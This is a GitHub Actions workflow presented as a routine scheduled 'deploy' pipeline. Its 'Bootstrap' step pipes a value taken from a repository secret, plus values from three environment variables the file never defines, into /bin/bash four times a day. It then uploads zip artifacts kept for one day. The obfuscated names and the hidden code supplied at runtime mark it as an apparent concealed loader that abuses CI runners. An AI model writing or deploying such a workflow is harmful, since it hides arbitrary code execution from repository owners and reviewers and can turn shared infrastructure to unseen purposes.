name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '7 3,9,15,21 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  deploy:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Bootstrap
        env:
          xi6: ${{ secrets.xi6 }}
        run: |
          printf '%s' "$xi6" | jq -r .e25 | /bin/bash
          echo $ow94276 | jq -r .khyv92 | /bin/bash
          echo $tkqbw8632 | jq -r .x86094 | /bin/bash
          printf '%s' "$vf3600" | jq -r .crn5151 | /bin/bash

      - name: Archive artifact
        uses: actions/upload-artifact@v4
        with:
          name: KhKF71nR
          path: "*.zip"
          retention-days: 1
